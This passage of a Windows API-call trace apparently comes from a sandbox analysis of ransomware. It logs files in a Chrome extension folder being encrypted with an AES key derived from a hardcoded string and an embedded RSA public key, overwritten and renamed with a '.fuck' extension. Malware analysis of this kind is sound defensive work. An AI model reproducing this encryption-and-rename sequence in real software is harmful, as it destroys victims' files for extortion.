Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js", dwFileAttributes=0x0) returned 1 [0254.013] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.gsg")) returned 1 [0254.014] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\contentscript_bin_prod.js.fuck")) returned 1 [0254.016] CryptDestroyHash (hHash=0x2985ea0) returned 1 [0254.016] CryptDestroyKey (hKey=0x2985f20) returned 1 [0254.016] CryptReleaseContext (hProv=0x29876d0, dwFlags=0x0) returned 1 [0254.016] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0254.016] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0254.016] GetLastError () returned 0x0 [0254.016] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json")) returned 0x20 [0254.017] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json", dwFileAttributes=0x80) returned 1 [0254.017] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0254.018] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.019] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.gsg", dwFileAttributes=0x2) returned 1 [0254.020] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x29876d0) returned 1 [0254.022] CryptCreateHash (in: hProv=0x29876d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0254.023] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.023] CryptHashData (hHash=0x29384f8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.023] CryptDeriveKey (in: hProv=0x29876d0, Algid=0x6610, hBaseData=0x29384f8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29387b8) returned 1 [0254.023] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.023] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0254.023] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2987a00) returned 1 [0254.024] CryptImportPublicKeyInfo (in: hCryptProv=0x2987a00, dwCertEncodingType=0x1, pInfo=0x298f2a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f2d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f2d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2985a20) returned 1 [0254.024] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0254.024] CryptEncrypt (in: hKey=0x2985a20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987a88*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2987a88*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0254.024] WriteFile (in: hFile=0x5d50, lpBuffer=0x2987a88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2987a88*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0254.026] ReadFile (in: hFile=0x5d64, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x356, lpOverlapped=0x0) returned 1 [0254.037] CryptEncrypt (in: hKey=0x29387b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x356, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x360) returned 1 [0254.037] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x360, lpOverlapped=0x0) returned 1 [0254.043] CloseHandle (hObject=0x5d64) returned 1 [0254.043] CloseHandle (hObject=0x5d50) returned 1 [0254.043] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), bFailIfExists=0) returned 1 [0254.052] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json", dwFileAttributes=0x0) returned 1 [0254.053] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.gsg")) returned 1 [0254.054] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dasherSettingSchema.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\dashersettingschema.json.fuck")) returned 1 [0254.056] CryptDestroyHash (hHash=0x29384f8) returned 1 [0254.056] CryptDestroyKey (hKey=0x29387b8) returned 1 [0254.056] CryptReleaseContext (hProv=0x29876d0, dwFlags=0x0) returned 1 [0254.056] FindNextFileA (in: hFindFile=0x28e7df8, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0254.056] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0254.056] GetLastError () returned 0x0 [0254.056] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js")) returned 0x20 [0254.057] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js", dwFileAttributes=0x80) returned 1 [0254.058] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.058] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0254.059] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\eventpage_bin_prod.js.gsg", dwFileAttributes=0x2) returned 1 [0254.060] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x293aae8) returned 1 [0254.062] CryptCreateHash (in: hProv=0x293aae8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0254.062] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.062] CryptHashData (hHash=0x2985ea0, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.062] CryptDeriveKey (in: hProv=0x293aae8, Algid=0x6610, hBaseData=0x2985ea0, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x29384f8) returned 1 [0254.063] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.063] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0254.063] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x293d678) returned 1 [0254.063] CryptImportPublicKeyInfo (in: hCryptProv=0x293d678, dwCertEncodingType=0x1, pInfo=0x298f1d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f200*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f208*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29387b8) returned 1 [0254.063] CryptEncrypt (in: hKey=0x29387b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0254.063] CryptEncrypt (in: hKey=0x29387b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293d920*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x293d920*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0254.064] WriteFile (in: hFile=0x5d64, lpBuffer=0x293d920*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x293d920*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0254.065] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.083] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.083] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.093] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.094] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.094] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.095] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.095] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0254.096] CryptEncrypt (in: hKey=0x29384f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0254.096] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, 